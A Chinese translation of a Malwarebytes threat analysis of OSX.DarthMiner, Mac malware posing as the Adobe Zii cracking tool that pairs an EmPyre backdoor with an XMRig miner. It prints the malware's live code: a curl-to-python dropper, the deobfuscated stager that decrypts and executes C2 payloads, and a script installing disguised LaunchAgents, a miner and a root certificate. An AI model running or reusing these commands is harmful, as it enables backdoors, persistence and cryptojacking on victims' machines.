本周早些时候，Malwarebytes实验室的安全研究人员发现了一种新的恶意软件，它将EmPyre后门和XMRig挖矿软件结合起来，组成了一种新型的MAC恶意软件。

目前，研究人员暂时将这个恶意软件命名为OSX.DarthMiner，它会伪装成Adobe Zii应用程序进行传播，adobe zii是一款adobe cc系列mac版非常好用的激活工具，其中Adobe Zii 2019 Mac版是著名破解团队TNT针对Adobe CC 2019 Mac版系列软件推出的破解工具，可以一键激活Adobe 2019 Mac版软件。 Adobe Zii是旨在帮助各种Adobe应用程序盗版的软件。

从上面的屏幕截图中可以看出，左侧的是真正的Adobe Zii软件使用的Adobe Creative Cloud徽标。右边的是OSX.DarthMiner的图标，它没有直接盗用Adobe Zii的图标，而是另外使用了一个很特别的Automator applet图标。所以研究人员就很纳闷，既然要决定伪装成Adobe Zii软件，为什么不使用它们的图标呢？

恶意行为分析

点击Automator图标后，就会启动伪装的Adobe Zii应用程序，经过测试它只是运行一个shell脚本。

curl https://ptpb.pw/jj9a | python - & s=46.226.108.171:80; curl $s/sample.zip -o sample.zip; unzip sample.zip -d sample; cd sample; cd __MACOSX; open -a sample.app

此脚本旨在下载并执行Python脚本，然后下载并运行名为sample.app的应用程序。sample.app很简单，它看起来只是Adobe Zii众多版本里的一个版本。

那么Python脚本呢？在分析Python脚本的过程中，研究人员发现该脚本经过了模糊处理，但很容易被反模糊，经过分析，里面包含的脚本如下。

import sys;import re, subprocess;cmd = "ps -ef | grep Little\ Snitch | grep -v grep"
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
out = ps.stdout.read()
ps.stdout.close()
if re.search("Little Snitch", out):
   sys.exit()
import urllib2;
UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='http://46.226.108.171:4444';t='/news.php';req=urllib2.Request(server+t);
req.add_header('User-Agent',UA);
req.add_header('Cookie',"session=SYDFioywtcFbUR5U3EST96SbqVk=");
proxy = urllib2.ProxyHandler();
o = urllib2.build_opener(proxy);
urllib2.install_opener(o);
a=urllib2.urlopen(req).read();
IV=a[0:4];data=a[4:];key=IV+'3f239f68a035d40e1891d8b5fdf032d3';S,j,out=range(256),0,[]
for i in range(256):
    j=(j+S[i]+ord(key[i%len(key)]))%256
    S[i],S[j]=S[j],S[i]
i=j=0
for char in data:
    i=(i+1)%256
    j=(j+S[i])%256
    S[i],S[j]=S[j],S[i]
    out.append(chr(ord(char)^S[(S[i]+S[j])%256]))
exec(''.join(out))

这个脚本的第一件事就是寻找Little Snitch，Little Snitch是一款Mac上简单易用的防火墙，除了保护我们的隐私数据外，Little Snitch的另一个大作用就是阻止软件的正版验证，Little Snitch可以监控和阻止特定软件的网络连接，例如当你启动Adobe的系列软件时，Little Snitch会通过弹出窗口提醒用户是否允许其网络连接，能够保护用户的隐私数据。如果Little Snitch存在，则恶意软件就会立即停止运行。当然，如果安装了像Little Snitch这样的防火墙，它就会阻止用户下载此脚本的连接，因此在此时进行安全检测毫无价值。

此脚本会打开与EmPyre后端的连接，该后端能够将任意命令推送到受感染的Mac上。后门一旦被打开后，它就会收到一个命令，将以下脚本下载到/private/tmp/uploadminer.sh并执行它。

# osascript -e "do shell script \"networksetup -setsecurewebproxy "Wi-Fi" 46.226.108.171 8080 && networksetup -setwebproxy "Wi-Fi" 46.226.108.171 8080 && curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem && security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain verysecurecert.pem\" with administrator privileges"
cd ~/Library/LaunchAgents
curl -o com.apple.rig.plist http://46.226.108.171/com.apple.rig.plist
curl -o com.proxy.initialize.plist http://46.226.108.171/com.proxy.initialize.plist
launchctl load -w com.apple.rig.plist
launchctl load -w com.proxy.initialize.plist
cd /Users/Shared
curl -o config.json http://46.226.108.171/config.json
curl -o xmrig http://46.226.108.171/xmrig
chmod +x ./xmrig
rm -rf ./xmrig2
rm -rf ./config2.json
./xmrig -c config.json &

此脚本会下载并安装恶意软件的其他组件，然后创建了一个名为com.proxy.initialize.plist的启动代理，这主要是为了运行经过模糊处理的Python脚本，来通过后门进行持续攻击。

该脚本还会将XMRig加密器和配置文件下载到/Users/Shared/文件夹中，并设置一个名为com.apple.rig.plist的启动代理，以使XMRig进程在该配置处于活动状态时运行。 “com.apple”名称直接就是一个的红色标志，这代表着危险，它也是研究人员能发现此恶意软件的根本原因。

有趣的是，该脚本中的代码可以用于下载和安装与mitmproxy软件（mitmproxy是一款http代理工具,即可用于中间人攻击,也可用于html抓包调试）相关的根证书，该软件能够拦截所有网络流量，包括（借助证书）加密的“https”流量。但是，该代码已被OSX.DarthMiner的开发者注释掉，并没有被激活。

从表面上乍一看，加密器最多只能通过占用所有的CPU和GPU资源来减慢受害者的Mac电脑的速度，这种恶意软件似乎并没有什么攻击性。但是仔细想想，这些加密器是通过后门发出的命令安装的，不出意外，该软件的开发者很可能通过该后门向Mac发送过其他命令。目前，还无法确切知道此恶意软件可能对受感染系统造成什么伤害，仅仅根据研究人员观察到的采矿行为来定义它，似乎还显得草率。

IOCs

Adobe Zii.app.zip SHA256: ebecdeac53069c9db1207b2e0d1110a73bc289e31b0d3261d903163ca4b1e31e

本文翻译自：https://blog.malwarebytes.com/threat-analysis/2018/12/mac-malware-combines-empyre-backdoor-and-xmrig-miner/

翻译作者：xiaohui 原文地址：  http://www.4hou.com/web/15101.html